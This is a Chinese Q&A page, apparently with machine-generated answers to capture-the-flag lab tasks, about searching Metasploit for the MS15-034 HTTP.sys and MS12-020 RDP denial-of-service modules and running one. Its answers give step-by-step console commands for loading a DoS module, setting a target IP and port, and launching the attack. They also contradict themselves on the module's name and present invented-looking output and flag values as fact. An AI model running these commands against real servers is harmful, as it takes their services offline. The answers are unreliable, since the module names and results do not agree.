在MSF工具中用search命令搜索MS15034HTTP.SYS漏洞拒绝服务攻击模块,将回显结果中的漏洞披露时间作为Flag值提交;(如:2015-10-16)命令
时间: 2024-02-16 20:03:14 浏览: 95
在MSF工具中使用`search`命令可以搜索Metasploit框架中的攻击模块。以下是搜索MS15-034漏洞拒绝服务攻击模块的命令:
```
search MS15-034
```
运行该命令后,将返回所有与MS15-034漏洞相关的攻击模块。在结果中找到`auxiliary/dos/http/ms15_034_ulonglongadd`模块,该模块用于利用MS15-034漏洞进行拒绝服务攻击。该模块的漏洞披露时间为2015年4月14日,因此Flag值为`2015-04-14`。
相关问题
在MSF工具中调用并运行MS15034HTTP.SYS漏洞的拒绝服务攻击模块,将运行此模块后回显结果中倒数第1行的最后一个单词作为Flag值提交、
好的,以下是在MSF工具中调用并运行MS15034HTTP.SYS漏洞的拒绝服务攻击模块,并获取Flag值的步骤:
1. 调用漏洞攻击模块
```
msf6 > use auxiliary/dos/windows/http/ms15_034_http_sys_memory_dos
```
2. 设置目标IP地址
```
msf6 auxiliary(dos/windows/http/ms15_034_http_sys_memory_dos) > set RHOST <目标IP>
```
请将`<目标IP>`替换为您要攻击的目标IP地址。
3. 设置攻击参数
```
msf6 auxiliary(dos/windows/http/ms15_034_http_sys_memory_dos) > set THREADS <线程数>
msf6 auxiliary(dos/windows/http/ms15_034_http_sys_memory_dos) > set RPORT <目标端口>
```
其中,`<线程数>`为要使用的线程数量,建议默认值为1;`<目标端口>`为要攻击的目标端口,默认值为80。
4. 运行攻击模块
```
msf6 auxiliary(dos/windows/http/ms15_034_http_sys_memory_dos) > run
```
运行攻击模块后,将会自动对目标IP进行拒绝服务攻击。
5. 获取Flag值
执行完毕后,将回显结果中倒数第1行的最后一个单词作为Flag值提交即可。例如:
```
[*] Sending DoS packets to <目标IP>:80 (press CTRL+C to stop)
[*] Auxiliary module execution completed
```
则Flag值为:`completed`。
在MSF工具中用search命令搜索MS12020 RDP拒绝服务攻击模块,将回显结果中的漏洞披露时间作为Flag值(如:2012-10-16)提交;命令
您可以在Metasploit中使用以下命令来搜索MS12020 RDP拒绝服务攻击模块:
```
search ms12-020
```
回显结果中的漏洞公开时间是2012-03-13,因此Flag值为:2012-03-13。
阅读全文